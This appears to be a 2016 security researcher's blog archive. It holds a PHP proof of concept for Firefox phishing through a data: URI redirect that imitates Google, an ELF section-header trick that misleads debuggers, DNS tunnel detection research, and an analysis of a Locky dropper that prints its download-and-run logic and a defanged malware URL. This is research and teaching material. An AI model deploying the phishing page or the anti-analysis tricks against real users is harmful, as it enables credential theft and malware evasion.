Monday 12 December 2016

Yet another phishing in Firefox with data URI and 302 redirect

1/ Introduction

Little known fact: you can redirect HTTP to a data URI.

2/ Let's have fun with redirect

Create a PHP file:
 <?php header("Location: data:text,Hello World"); ?>
and serve it to Firefox. In all its glory, Firefox will print "Hello World".
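
For reference, PHP's header("Location: ...") also switches the status code to 302 (unless a 201 or another 3xx has already been set), so what reaches the browser is an ordinary redirect whose target happens to be a data URI. Here is a minimal Python sketch of that raw response. The helper name redirect_response is made up for illustration, and the header set is reduced to the bare minimum:

```python
def redirect_response(location):
    """Build the raw bytes of a bare HTTP 302 response pointing at `location`."""
    lines = [
        "HTTP/1.1 302 Found",
        "Location: " + location,   # the redirect target, here a data: URI
        "Content-Length: 0",
        "",                        # empty line ends the headers
        "",
    ]
    return "\r\n".join(lines).encode("ascii")

# Same target as the PHP one-liner above.
raw = redirect_response("data:text,Hello World")
print(raw.decode("ascii"))
```

Nothing in the response itself is unusual, which is the whole point: the interesting part is only what the browser does with the Location value.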

3/ Enhance with phishing

And yes, you can use HTML instead of plain text, and with HTML you can do whatever you want. The beginning of the data: URI is also displayed in the address bar, which looks like a good starting point for some fun.
  • First, add HTML capabilities: data:text/html,
  • Second, trick the user through the address bar, since it displays the content of the data: scheme: 
  • Third, add some HTML (and clean up)
    <html><script>document.body.innerHTML = '';</script><br>No, this is not from google accounts!!<br><br></html>
  • Fourth, be nice and add a pretty title in the Firefox tab bar: Google

4/ Ready to go:

Create a php file like this:

 <?php
 $data_uri = "data:text/html,";  
 $decoy = "";  
 $evil_html = "<html><script>document.body.innerHTML = '';</script><br>No, this is not from google accounts!!<br><br></html>";  
 $pretty_tab_print = "Google";  
 $redirect_url = $data_uri . $decoy . $evil_html . $pretty_tab_print;  
 header("Location: " . $redirect_url);  

Then trick a user into visiting this page (you know, the usual phishing stuff, for instance through any URL shortener).

A click on this php file served through a webserver will drive you to:

5/ Is it something new?

Well, yes and no.
Phishing with data URIs has been known for a very long time. A paper was published some time ago;
this is the same idea, I've just added the 302 redirect as a delivery vector.

It's not a big deal: if you're tricked by this, you can be tricked by anything else.

Monday 5 December 2016

Finding DNS tunnels by analyzing network captures

A DNS tunnel is a method used to exchange data on top of DNS traffic. It's generally used to bypass filtering equipment so that two hosts can communicate.

This article is about detecting DNS tunnels. Can we find them by analyzing a pcap offline? We will see that the first basic solution (counting the subdomains of a domain) is prone to a high number of false positives when applied to real DNS data. We will then look at other approaches which could help with DNS tunnel detection.

1/ DNS tunnels: the theoretical part

The theory here is super easy. If a client in a protected network can send DNS requests and receive responses, then you can mount a DNS tunnel.

The client sends encoded data as a subdomain of the attacker's domain and waits for the answer. This way, data is exchanged. The client just has to make each DNS request unique, in order to avoid caching by an intermediary DNS server. Thanks to the multiple types of DNS requests, and to the size of requests, you can get enough bandwidth for a decent ssh session.

You can find a lot of resources for building DNS tunnels with a lot of tools: iodine, dnscapy, dnscat2, etc. Those tools usually provide some encryption and helpers to exchange data.

2/ Finding should be super easy by counting requests

The most obvious way to spot a DNS tunnel should be to count the number of subdomains of a given domain. For each chunk of data, the client has to build a new DNS name under the domain owned by the attacker.

I captured some DNS traffic while using a DNS tunnel (dnscat2 in this case). I estimate that one can type a lot of harmful bash commands in dnscat2 in fewer than 50 DNS requests. Let's use 50 as a threshold: if a domain has more than 50 subdomains, flag it as a DNS tunnel.
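
The counting idea can be sketched in a few lines of Python. This is only an illustration, not the script used for the outputs shown in this post: the function names are made up, "rank" means the number of labels kept to the left of the TLD, and the sample hostnames are invented.

```python
from collections import defaultdict

def count_subdomains(names, rank):
    """Map each suffix made of rank+1 labels to the distinct names seen below it."""
    children = defaultdict(set)
    for name in names:
        labels = name.lower().rstrip(".").split(".")
        if len(labels) > rank + 1:          # only names that really are subdomains
            suffix = ".".join(labels[-(rank + 1):])
            children[suffix].add(".".join(labels))
    return children

def flag_tunnels(names, threshold=50, max_rank=2):
    """Return {domain: count} for domains with more than `threshold` subdomains."""
    flagged = {}
    for rank in range(1, max_rank + 1):     # rank 0 (bare TLDs) is skipped
        for suffix, subs in count_subdomains(names, rank).items():
            if len(subs) > threshold:
                flagged[suffix] = len(subs)
    return flagged

# Invented sample: 60 unique names under one domain, plus two ordinary hosts.
names = ["%04x.dnscat2.tux" % i for i in range(60)]
names += ["www.example.com", "mail.example.com"]
print(flag_tunnels(names))
```

Only the domain with 60 distinct subdomains crosses the threshold here; the two ordinary hosts stay well below it.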

3/ Ok, let's do it the dirty way: bash+python

There are many ways to analyze data; I chose a two-step approach:
  • first, extract the interesting data with tshark and bash to a flat file
    tshark -2 -r "$1" -R "dns.flags.response == 1" -T fields -e > doms_qry
  • then analyze the data with python
This is convenient for me because I have easy access to the flat file after extraction and before analysis.

mitsurugi@dojo:~/DNS_analyzer/analyze_doms$ ./ ../dnscat2.pcap
Copied unique domains in doms_qry
Number of domains copied: 244 doms_qry
mitsurugi@dojo:~/DNS_analyzer/analyze_doms$ ./

Longest domains is constitued of 6 labels

Longest domain name is 235 char long:

######### Following domains ###########
Interesting tld for rank 0
 tux(243 subdomains)

######### Following domains ###########
Interesting tld for rank 1
 dnscat2.tux(243 subdomains)

You should investigate on domains
    dnscat2.tux  (243 subdomains)

That works remarkably well. If you find this kind of data in your DNS logs, you should investigate quickly.

4/ But, does this work in real life? (spoiler: no)

Well, this works in a test lab. Now, how does it work in real life?
I have to say that it's incredibly hard to find real DNS data. See the end of this post for details, but I had the chance to get my hands on two full pcap captures from a university. I have to name and thank ISCX: the data is legit for research and analysis. Really, a big thanks.

Now, let's use the exact same programs and see if we can find DNS tunnels in those captures:

 mitsurugi@dojo:~/DNS_analyzer/analyze_doms$ ./

Longest domains is constitued of 8 labels

Longest domain name is 59 char long:

######### Following domains ###########
Interesting tld for rank 0
 au(54 subdomains); net(1502 subdomains); gov(53 subdomains); jp(96 subdomains); org(195 subdomains); com(3181 subdomains); uk(91 subdomains)

######### Following domains ###########
Interesting tld for rank 1 subdomains); subdomains); subdomains); subdomains); subdomains); subdomains); subdomains); subdomains); subdomains); subdomains)

######### Following domains ###########
Interesting tld for rank 2 subdomains); subdomains)

You should investigate on domains  (146 subdomains)  (121 subdomains)  (105 subdomains)  (98 subdomains)  (87 subdomains)  (73 subdomains)  (68 subdomains)  (54 subdomains)  (52 subdomains)  (51 subdomains)

OK, so that's a full list of false positives. If I raise the threshold, I may miss some short-lived DNS tunnels.

I think we can clearly say that counting the number of subdomains doesn't work in practice.

5/ Can we do better? (spoiler: yes, sort of)

We have some options here:

5/1/ whitelisting domains

I don't like the idea of whitelisting. Maintaining such lists is usually a pain, but it can help you.

5/2/ analyzing only requests of type other than 'A' (and 'AAAA').

Well, you'll still end up with a lot of MX and/or SPF records, but it's a good way to lower the noise and it should help. I haven't seen any DNS tunnel relying on A or AAAA types, but hackers have a lot of imagination.

5/3/ calculating entropy of domain.

Yeah, it should work. But you will face other problems: CDN names can look random, and MX names can look totally legit while carrying DNS tunnel data. More and more file reputation and cloud antivirus services rely on TXT DNS requests... and they look exactly like DNS tunnels (a lot of different TXT requests going to the same domain). So, try at your own risk.

5/4/ Analyzing DNS response instead of requests.

It would be a lot better, combined with the previous one. Still, a hacker would be able to use AAAA or A records to exchange data (the throughput of the tunnel would be lowered by an order of magnitude, but hackers have a lot of time...)

5/5/ Raising threshold

It could work, but we have to agree on a number that is neither too high nor too low. In the end, we would still have to rely on human analysis, and it can't work that way.

6/ Lessons learned

There are some lessons here:

Counting subdomains doesn't work

No, counting subdomains doesn't work at all. It can help to lower the amount of data to analyze, but you can't trust it.

It's hard to grab DNS data (really.) 

Sad but true. If you want to share DNS data with me (or know a place where I can get some), I would be grateful. Beware: DNS data is an impressive source of metadata and raises a lot of privacy concerns.

Parsing DNS data is not that easy. 

Everybody thinks they know DNS: "you ask for an FQDN, you get an IP", and it's WRONG! You can end up with a lot of RRs, multiple queries, UDP and TCP, endless CNAME requests, and so on. For this kind of research a flat file is enough, but I have to find a better way to parse and analyze this kind of structured data.

...and beyond

You can find a LOT of things inside DNS data (more blog posts to come)

You fool! Don't make me laugh!
~Soulcalibur - Mitsurugi


Tuesday 20 September 2016

Break On Call and Break On Ret under gdb

1/ Adding BOC and BOR for gdb

As a reverse engineer, I really like gdb. It has a lot of cool features and is scriptable through python.

While I was solving a crackme challenge, I needed a break on call and a break on ret instruction. I searched the web and did not find what I wanted.

So, I developed a boc (break on call) and a bor (break on ret) command, and I'm sharing them today.

2/ How does it work?

You just have to source a python file and you end up with three commands:
  • boc : activate break on call with boc on or boc off. You can choose between breaking and printing on call with boc break or boc print
  • bor : same commands for break on ret
  • go : if you have selected boc on and/or bor on, typing go will execute the binary until the next call or next ret
 $ gdb -nx -q  
 (gdb) source   
 (gdb) boc  
 Status of Break on Call is off/break  
   Change with boc on/off and boc break/print  
 (gdb) bor  
 Status of Break on Ret is off/break  
   Change with bor on/off and bor break/print  
 (gdb) boc on  
 (gdb) boc  
 Status of Break on Call is on/break  
   Change with boc on/off and boc break/print  

3/ Please, just show me the code! 

It's on github
The Readme shows a typical bocbor session.

4/ Enjoy

Feedback, bugs: mail or twitter

Tuesday 30 August 2016

Don't always trust your debugger blindly : What You See Is not What You Get!

0/ Intro

A debugger or debugging tool is a computer program that is used to test and debug other programs (the "target" program) (source: Wikipedia). IDA and gdb are well-known examples used in the security community.

A debugger is also the security analyst's best friend :-) It helps him (or her) understand what the program is doing. But what if somebody crafts an executable file which behaves differently in the debugger and in real life?

Let's do that under linux with an ELF binary. ELF is an executable format, supported by IDA and gdb. The format of ELF files is well-known. ELF contains headers, Program Headers and Section Headers.

Program headers are read by the kernel when the ELF binary is launched; Section headers are read by debuggers. In theory, they describe the same thing. In theory, they said.

Let's start with a very simple Hello World program:
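 #include <stdio.h>  
 #include <stdlib.h>  
 const char hello[]="Hello World\n\x00\x03\x00\x00\x00\x01\x00\x02";  
 const char hell[]="Bad, bad World\n";  
 int main(void) {  
   /* body reconstructed from the disassembly shown later: puts@plt, then exit@plt */  
   puts(hello);  
   exit(0);  
 }  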

Don't pay attention to the garbage at the end of hello[] or to the presence of hell[] for now. No need to be an expert to understand what will be printed.

1/ Taking a look at Section headers

Let's look at .rodata section, containing the strings, and the relevant asm part in .text:

 mitsurugi@dojo:~/chall/magick$ readelf -x .rodata hello  
 Hex dump of section '.rodata':  
  0x080484e8 03000000 01000200 48656c6c 6f20576f ........Hello Wo  
  0x080484f8 726c640a 00030000 00010002 00426164 rld..........Bad  
  0x08048508 2c206261 6420576f 726c640a 00       , bad World..  
 mitsurugi@dojo:~/chall/magick$ readelf -S hello  
 There are 30 section headers, starting at offset 0xf20:  
 Section Headers:  
  [Nr] Name       Type      Addr   Off  Size  ES Flg Lk Inf Al  
  [ 0]          NULL      00000000 000000 000000 00   0  0 0  0 4  
  [15] .rodata      PROGBITS    080484e8 0004e8 00002e 00  A 0  0 4  

And the asm:
 0804842b <main>:  
  804842b:     8d 4c 24 04          lea  0x4(%esp),%ecx  
  804842f:     83 e4 f0             and  $0xfffffff0,%esp  
  8048432:     ff 71 fc             pushl -0x4(%ecx)  
  8048435:     55                   push  %ebp  
  8048436:     89 e5                mov  %esp,%ebp  
  8048438:     51                   push  %ecx  
  8048439:     83 ec 04             sub  $0x4,%esp  
  804843c:     83 ec 0c             sub  $0xc,%esp  
  804843f:     68 f0 84 04 08       push  $0x80484f0  
  8048444:     e8 a7 fe ff ff       call  80482f0 <puts@plt>  
  8048449:     83 c4 10             add  $0x10,%esp  
  804844c:     83 ec 0c             sub  $0xc,%esp  
  804844f:     6a 00                push  $0x0  
  8048451:     e8 ba fe ff ff       call  8048310 <exit@plt>  

puts will print the string located at 0x080484f0, in the .rodata section, which is "Hello World\n\x00<unprinted garbage>"

The Section headers say that 0x2e bytes from file offset 0x4e8 are placed at address 0x080484e8.

Let's change this slightly. In the section headers only, let's say that the .rodata section copies 0x18 bytes from offset 0x4fd to 0x080484e8.
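
To see what this change does to a tool that trusts the section headers, here is the arithmetic as a small Python sketch. It assumes the tool translates an address into a file offset as offset + (address - section address). The helper names are made up, and the "file" is a synthetic buffer holding only the .rodata bytes from the hex dump above.

```python
def addr_to_offset(addr, sec_addr, sec_off, sec_size):
    """Translate a virtual address to a file offset using one section header."""
    if not sec_addr <= addr < sec_addr + sec_size:
        raise ValueError("address outside section")
    return sec_off + (addr - sec_addr)

def c_string(image, offset):
    """Read a NUL-terminated string from a bytes object."""
    end = image.index(b"\x00", offset)
    return image[offset:end]

# Synthetic file image: the .rodata bytes from the hex dump, placed at offset 0x4e8.
rodata = (bytes.fromhex("0300000001000200")
          + b"Hello World\n\x00\x03\x00\x00\x00\x01\x00\x02\x00"
          + b"Bad, bad World\n\x00")
image = b"\x00" * 0x4e8 + rodata + b"\x00" * 16

PUSHED = 0x80484f0  # the address pushed before the call to puts in main

original = addr_to_offset(PUSHED, 0x080484e8, 0x4e8, 0x2e)  # real header
patched = addr_to_offset(PUSHED, 0x080484e8, 0x4fd, 0x18)   # modified header
print(hex(original), c_string(image, original))
print(hex(patched), c_string(image, patched))
```

With the real header the address lands on file offset 0x4f0, the start of hello[]. With the modified one it lands on 0x505, the start of hell[]. The garbage at the end of hello[] is only there to move hell[] to a convenient offset.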

2/ Who are you, and what are you doing to my Section headers?

We now have a second file, called hello-patched. This file still runs fine:
 mitsurugi@dojo:~/chall/magick$ ./hello-patched   
 Hello World  

The relevant part of the Section headers is now:
 mitsurugi@dojo:~/chall/magick$ readelf -S hello-patched   
 There are 30 section headers, starting at offset 0xf20:  
 Section Headers:  
  [Nr] Name       Type      Addr   Off  Size  ES Flg Lk Inf Al  
  [15] .rodata      PROGBITS    080484e8 0004fd 000018 00  A 0  0 4  

2/1/ IDA gets tricked

Here is the screenshot of IDA disassembling this file:

Well, this can be confusing when you know that ./hello writes "Hello World"

So, what you see with IDA is not what you get (I've tested the Free edition of IDA v5.0 and IDA Pro 6.7)

2/2/ gdb is even more confusing

The string shown by x/s is not the one printed by the puts call :)

 mitsurugi@dojo:~/chall/magick$ gdb -nx -q hello-patched  
 Reading symbols from hello...(no debugging symbols found)...done.  
 (gdb) disass main  
 Dump of assembler code for function main:  
   0x0804842b <+0>:     lea  0x4(%esp),%ecx  
   0x0804842f <+4>:     and  $0xfffffff0,%esp  
   0x08048432 <+7>:     pushl -0x4(%ecx)  
   0x08048435 <+10>:     push  %ebp  
   0x08048436 <+11>:     mov  %esp,%ebp  
   0x08048438 <+13>:     push  %ecx  
   0x08048439 <+14>:     sub  $0x4,%esp  
   0x0804843c <+17>:     sub  $0xc,%esp  
   0x0804843f <+20>:     push  $0x80484f0  
   0x08048444 <+25>:     call  0x80482f0 <puts@plt>  
   0x08048449 <+30>:     add  $0x10,%esp  
   0x0804844c <+33>:     sub  $0xc,%esp  
   0x0804844f <+36>:     push  $0x0  
   0x08048451 <+38>:     call  0x8048310 <exit@plt>  
 End of assembler dump.  
 (gdb) x/s 0x80484f0  
 0x80484f0 <hello>:     "Bad, bad World\n"  
 (gdb) run  
 Starting program: /home/mitsurugi/chall/magick/hello-patched   
 Hello World  
 [Inferior 1 (process 5382) exited normally]  

Ok, that's not entirely true: as soon as you run the program, the section is corrected and x/s works as expected, but the demo is worth it. Said differently: if you don't run the binary under gdb, you'll get it all wrong.

3/ Conclusion

Now think of a crackme, or a malware, using this technique. Static analysts will get lost without even noticing it :-)

Well, nothing new here: if the same information can be picked from two different places, you can be sure there will be problems.
The fact that Section headers can be changed has been known for a very long time; I just wanted to play a bit with it and manipulate the ELF format. The idea for this blog post was born after filing a bug I had with radare2.
You can read another blog post here, with some mitigations as a bonus.

If you want to try it with your debugger, you can download a copy of the patched hello file here: (sha256 = f63edf2de7d4edeb02650e3821921ddf3831ee33226cece8f81f31b912e464a5 ) and if it works/fail send me the info, I could compile some results :-)

There are few people who will make mistakes with fire after having once been burned.
~Yamamoto Tsunetomo

Friday 29 July 2016

Update about #Locky xoring data scheme

1/ Intro

This post is a follow-up of this one:

The malware in question is Locky.

2/ Another Locky

Somebody sent me other Locky zip files, and I quickly figured out that the core functionalities are the same:
  • a .wsf in a zip file (wsf format slightly changed, so my prog in github does not work anymore)
  • some layer of obfuscation
  • all variables are named different, but the structure and functions are the same
  • The downloaded file is XOR-ed with values coming from a PRNG function
  • the PRNG seed has changed

This blogpost will talk about the PRNG.


Wikipedia to the rescue:
A pseudorandom number generator (PRNG) is an algorithm for generating a sequence of numbers whose properties approximate the properties of sequences of random numbers. The PRNG-generated sequence is not truly random, because it is completely determined by a relatively small set of initial values, called the PRNG's seed. (...) pseudorandom number generators are important in practice for their speed in number generation and their reproducibility.

And that's it. I think this is a really interesting move because the file downloaded over HTTP looks like random data. Here is the entropy for the file (made with binwalk):

You can compare with the file, once XOR-ed :

This is an interesting way to avoid analysis.
All the network probes only see random data. No particular header, no pattern to match.
No static key either (a file XORed with a static key doesn't see its entropy change much, and the key can be recovered).
You could possibly block files downloaded over HTTP when they have no known header and are around 200kB, but that's not really precise.
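
The entropy argument can be checked with a small Python sketch. Everything here is illustrative: the sample data is an invented repetitive buffer of about 200 kB, the static key is a single byte, and Python's random module stands in for the PRNG (it is not the one used by Locky).

```python
import math
import random
from collections import Counter

def shannon_entropy(data):
    """Entropy in bits per byte: 0 for constant data, 8 for uniformly spread bytes."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return -sum(n / total * math.log2(n / total) for n in counts.values())

def xor_static(data, key):
    """XOR every byte with the same one-byte key."""
    return bytes(b ^ key for b in data)

def xor_keystream(data, seed):
    """XOR every byte with the next output of a seeded PRNG (stand-in generator)."""
    rng = random.Random(seed)
    return bytes(b ^ rng.randrange(256) for b in data)

# Invented, highly repetitive sample of roughly 200 kB.
plain = b"This program cannot be run in DOS mode.\r\n" * 5000

print(round(shannon_entropy(plain), 3))
print(round(shannon_entropy(xor_static(plain, 0x5A)), 3))
print(round(shannon_entropy(xor_keystream(plain, 1234)), 3))
```

A one-byte static key only relabels the byte values, so the entropy stays exactly where it was. The keystream version climbs close to 8 bits per byte, which is what a network probe would see on the wire.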

4/ Get the seed

In my previous blog post, I just copy-pasted the PRNG function, with the seed.
If you want to quickly get the seed, you can grep for mash(<data>) in the .wsf file, once it is extracted from the zip and deobfuscated.

Everything else is the same: generate more than 200k pseudo-random numbers, then XOR the file:
 mitsurugi@dojo:~/chall/infected$ js24 uhe_prng.js > prng_js   
 mitsurugi@dojo:~/chall/infected$ ./ cj937f7l  
 mitsurugi@dojo:~/chall/infected$ file cj937f7l cj937f7l-xored   
 cj937f7l:    data  
 cj937f7l-xored: PE32 executable (GUI) Intel 80386, for MS Windows  

5/ Conclusions and questions

I think that not everything has been said about Locky. When I read interesting analyses like the one from malwarelabs, I don't understand why they didn't run into the XOR part. There is no mention of the XOR: they found URLs in the wsf file, then they got an .exe file (wut?).
Are there several campaigns, some with a plain exe file and others with a XOR-ed one? As the URLs mentioned in the malwarelabs post are not available anymore, I can't tell :-/

And if you have other samples to share, I'm still willing to take a look :-)

Courage first; power second; technique third.

Monday 18 July 2016

Analyzing zip with .wsf file inside

0/ Intro

Between the 13th and 16th of July, I received a lot of spam, all based
on the same, now classic, pattern. A mail body with wording like:
"How is it going?
Please find attached document you asked for and the latest payments report
Hope that helps. Drop me a line if there is anything else you want to know"


"Please find the reference letter I attached."

and a zip file attached containing one file ending in .wsf

 mitsurugi@dojo:~/chall/infected/zipped_wsf$ unzip -l   
  Length   Date  Time  Name  
 --------- ---------- -----  ----  
   29295 2016-07-15 11:09  spreadsheet_87a4..wsf  
 ---------           -------  
   29295           1 file  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ unzip -l   
  Length   Date  Time  Name  
 --------- ---------- -----  ----  
   28380 2016-07-15 11:17  spreadsheet_7ff..wsf  
 ---------           -------  
   28380           1 file  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ unzip -l   
  Length   Date  Time  Name  
 --------- ---------- -----  ----  
   71060 2016-07-14 11:19  spreadsheet_17f5..wsf  
 ---------           -------  
   71060           1 file  

1/ stage 1 - unzip and get the script

All of the .wsf files I saw look more or less the same:

We have a job declaration, then a very long var (I snipped it for brevity, the line is more than 28000 chars long). This var is just a concatenation of strings, and in the end, it's reversed.

In order to analyze it, you can copy/paste this var in a python file, and just reverse it:
 #! /usr/bin/python  
 aFusa0arM = ';}\n\r;)('+']fJU (... snipped +28000 chars for brievety ...)
 Fo'+'Tev" = '+'jXO rav'+'\n\r;"" +'+' "eli" '+'= tI ra'+'v\n\r;"" '+'+ "esol'+'c" = 0q'+'O rav';
 print aFusa0arM[::-1]  
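
To make the trick concrete, here is the same reversal applied to the last few pieces visible above. The first piece is trimmed so that it starts at a statement boundary, and the print() call is written so that it runs under both Python 2 and Python 3:

```python
# Tail of the obfuscated variable: pieces are concatenated first, then reversed.
pieces = [';"" ', '+ "esol', 'c" = 0q', 'O rav']
recovered = "".join(pieces)[::-1]
print(recovered)
```

The result is one of the many small var declarations that make up the javascript of stage 2.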

2/ stage 2 - unobfuscate the javascript

The javascript file is 700 lines long. A quick glance at it reveals the obfuscation.

2/1/ Obfuscation : use of variables

The code relies heavily on variables. There are a lot of assignments:

 var VYd = "ct" + "";  
 var ZMv = "je" + "";  
 var UJd = "teOb" + "";  
 var AYe0 = "ea" + "";  
 var Co7 = "Cr" + "";  

Then, later on:
 var IUh=WScript[Co7 + AYe0 + UJd + ZMv + VYd]  

2/2/ Obfuscation : use of useless functions - 1

We also see a lot of useless functions which simply return their input:

 function Xr1(WDv){return WDv;};  
 function Wu6(Jw3){return Jw3;};  

And then, their use:
 IUh[OEc2 + ZBb4](Yr2[Yc8 + USr + Wu6(En) + Gt2]);  

Still, it's just basic obfuscation

2/3/ Obfuscation : use of useless functions - 2

There is another kind of useless function. These are called only once and produce a fixed output. We can find them from time to time:

 var SWh3=[Ww + NBp4 + (function BEs0(){return Xk6;}()) + IHx1 + QMa + CAi2, JRu9(QVt0) + Ir4 + MIs + XKm + Vo];  

The SWh3 var can be simplified to:

 var SWh3=[Ww + NBp4 + Xk6 + IHx1 + QMa + CAi2, QVt0 + Ir4 + MIs + XKm + Vo];  

2/4/ Unobfuscate

That's not really hard: load all the vars, substitute them into the expressions, remove all the useless functions, and compute the strings.
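
Those steps can be sketched with a few regular expressions. This is a simplified illustration and not the script from the repository (no eval() here). The sample reuses the declarations shown in 2/1/, and its last line is a variation on the post's example that mixes in both kinds of useless function. All helper names are made up.

```python
import re

SAMPLE = r'''
var VYd = "ct" + "";
var ZMv = "je" + "";
var UJd = "teOb" + "";
var AYe0 = "ea" + "";
var Co7 = "Cr" + "";
function Wu6(Jw3){return Jw3;};
var IUh=WScript[Co7 + AYe0 + UJd + Wu6(ZMv) + (function BEs0(){return VYd;}())]
'''

VAR_RE = re.compile(r'var\s+(\w+)\s*=\s*"([^"]*)"\s*\+\s*"";')
IDENTITY_RE = re.compile(r'function\s+(\w+)\((\w+)\)\{return\s+\2;\};?')
IIFE_RE = re.compile(r'\(function\s+\w+\(\)\{return\s+(\w+);\}\(\)\)')

def deobfuscate(js):
    strings = dict(VAR_RE.findall(js))                 # 1. load all string vars
    identities = [name for name, _arg in IDENTITY_RE.findall(js)]
    js = IDENTITY_RE.sub("", js)                       # 2. drop identity definitions
    js = IIFE_RE.sub(r"\1", js)                        # 3. inline call-once functions
    for name in identities:                            # 4. unwrap identity calls
        js = re.sub(r"\b%s\((\w+)\)" % re.escape(name), r"\1", js)

    def fold(match):                                   # 5. compute the strings
        names = [part.strip() for part in match.group(1).split("+")]
        if all(n in strings for n in names):
            return "[" + "".join(strings[n] for n in names) + "]"
        return match.group(0)

    return re.sub(r"\[([^\[\]]+)\]", fold, js)

for line in deobfuscate(SAMPLE).splitlines():
    if "IUh" in line:
        print(line)
```

Bracket expressions that still contain an unknown name are left untouched, which makes it easy to spot what the patterns missed.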

3/ part 2 - unobfuscation

Once the vars are renamed, we can see the big picture of the file:

3/1/ vars declaration

The file begins with almost 700 lines of var declaration.

But only one line is really interesting:
 var VVq=[Jj+Qo5 + ZKy+(function PGr3(){return STa5;}())+ASs2 +   
 (function ICe1(){return XOl;}())+Aq5+MDs6 + Ty9+GZq + Pe+Pa1 +   
 Mp4+Xr1(Rq8)+(function WXz(){return Xw5;}()),   
 (function Ni8(){return Jj;}())+Eb+Lp0+Zv+Gu+RSq + JXa+Jv+Ne+  
 Wp + Yg+Ov + Kz1+RZl8+BBv + COk+IYz, Qe+Kg7+Em+Uc +   
 (function Ci(){return KKd1;}())+(function PJm6(){return Iq0;}())+  
 FWe(MAp7)+Uq3+Xv1 + Mf + DOo6+Nm(TEz5)+Ex5];  

Which can be read as:
var VVq=[element1, element2, element3]

This declares an array of three elements. After searching and replacing the vars, we can read:

3/2/ a PRNG

 function uheprng()  
 function rawprng()  
 function Mash()  
If you google this, you can find that's a random number generator. It will be used later.

3/3/ The juicy part (vars unobfuscated)

 var IUh=WScript[CreateObject](ADODB.Stream);  
 IUh[SaveToFile](DJt9, Kn5);  
 var GHq4=Nh(DJt9); // Ok  
 GHq4=Zy(GHq4);   // This function is important  
 if (GHq4[length] < 100 * 1024 || GHq4[length] > 230 * 1024 || !ZZr(GHq4))  
   STn /* H */(Vh9, GHq4);  // it renames the file with .exe  
 catch (e) {break;};  
 Sn[Run](Vh9 + " 321");   //It runs the exe file with 321 as argument  

3/4/ the Zy function

the Zy() function is interesting:
 function Zy(WPx8)  
   var NKh;  
   var Je = uheprng();  
   for (var KFh4=0; KFh4 < WPx8[length]; KFh4++)  
     WPx8[KFh4] ^= Je(256);  
 (other stuff...)  

We can see that it XORs every byte with the next output of the PRNG, Je(256), i.e. a pseudo-random value between 0 and 255.

3/5/ The Nh() and STn /* H  */() functions

Those functions look more or less the same. Each opens a file, then does byte translations if charCode > 128.
Maybe I'm missing something, but we don't need that to deobfuscate the exe file.

4/ Decrypt exe file

We have the download URLs, a wget is enough to get the file.
The hard part is to generate all the pseudo-random numbers. I chose the easy way: copy-paste the PRNG function into a js file, then generate enough pseudo-random numbers to use them later:

 function uheprng() {return (function() {
 var o = 48, c = 1, p = o, s = new Array(o);
 var i,j;
 var base64chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
 var mash = Mash();
 for (i = 5806 - 5806; i < o; i++) s[i] = mash(0.598538);  // the seed
 mash = null;
 var random = function( range ) {
 return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
 };
 function rawprng() {
 if (++p >= o) p = 0;
 var t = (482628 * 3 + 320979) * s[p] + c * 2.3283064365386963e-10;
 return s[p] = t - (c = t | 0);
 }return random;}());};
 function Mash() {
 var n = 0xefc8249d;
 var mash = function(data) {
 if ( data ) {
 data = data.toString();
 for (var i = 0; i < data.length; i++) {
 n += data.charCodeAt(i);
 var h = 0.02519603282416938 * n;
 n = h >>> 0;
 h -= n;
 h *= n;
 n = h >>> 0;
 h -= n;
 n += h * 0x100000000;
 }
 return (n >>> (1 * 0)) * 2.3283064365386963e-10;
 } else n = 0xefc8249d;
 };
 return mash;
 }
 var Je = uheprng();
 for (var i=0; i<200000; i++){
 print(Je(256)); }  // one pseudo-random byte value per line
and we can save all those numbers in a file:
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ js24 UHE_prng.js > prng_js  

Then a wget and an easy python script will get you the exe file:
 for i in p:  
 for i in range(len(data)):  
and we get:
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ ./ 8f72pw  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ file data  
 data: PE32 executable (GUI) Intel 80386, for MS Windows  
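
The un-XOR step itself is tiny. Here is a minimal Python 3 sketch of it, assuming the keystream is the dump produced above (one integer per line). The function names and the demo values are made up, and this is not the script from the repository:

```python
def parse_keystream(text):
    """Turn the PRNG dump (one integer per line) into a list of ints."""
    return [int(value) for value in text.split()]

def unxor(data, keystream):
    """XOR each byte of data with the keystream value at the same position."""
    if len(keystream) < len(data):
        raise ValueError("keystream shorter than data, generate more numbers")
    return bytes(b ^ (k & 0xFF) for b, k in zip(data, keystream))

# Self-contained demo with invented values instead of the real files.
keystream = parse_keystream("17\n203\n5\n99\n")
scrambled = unxor(b"MZ\x90\x00", keystream)   # what would travel over HTTP
restored = unxor(scrambled, keystream)        # XOR is its own inverse
print(restored[:2])
```

With the real files, the keystream would come from open("prng_js").read() and the data from the downloaded file opened in binary mode. The length check matters because the dump holds 200000 numbers while the dropper accepts files up to 230 * 1024 bytes.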

Now, we need somebody brave enough to launch it with 321 as an argument

5/ Automate all the things

I wrote two python scripts. The first one extracts URLs from the zip file. The second one un-XORs the file. These are quick & dirty scripts and "It works for me" (tm)

 mitsurugi@dojo:~/chall/infected/zipped_wsf$ ./  
 Extracting zip  
 [+] Ok zip contains one file ending in .wsf  
 Get obfusctated js  
 [+] Assigning a long var, seems good  
 [+] We have to reverse the string  
 Parsing obfuscated and getting URLs  
 [+] printing download URLs  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ wget -q http://mana114[.]  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ ./ iqfywp  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ file data  
 data: PE32 executable (GUI) Intel 80386, for MS Windows  

  • The python file does an eval() to concatenate all the vars. This is considered dangerous. Use at your own risk.
  • Some zip files are not exactly the same and my parser doesn't handle those. The logic behind them is the same, but you will have to do the analysis by hand. From what I saw, it's always the same logic: un-XOR a file with a PRNG
  • Be aware that those scripts rely on a very small subset of zip files and on a lot of assumptions. 
  • Be aware that I'm using the PRNG with 256 as a fixed value. If it changes, the un-XOR won't work.
  • If you have some samples which don't work, I can take a look.

Here is the link to the github repo:


Our greatest glory is not in never falling, but in rising every time we fall!

You are not judged by the way you fall. 
You are judged by the way you get up after.

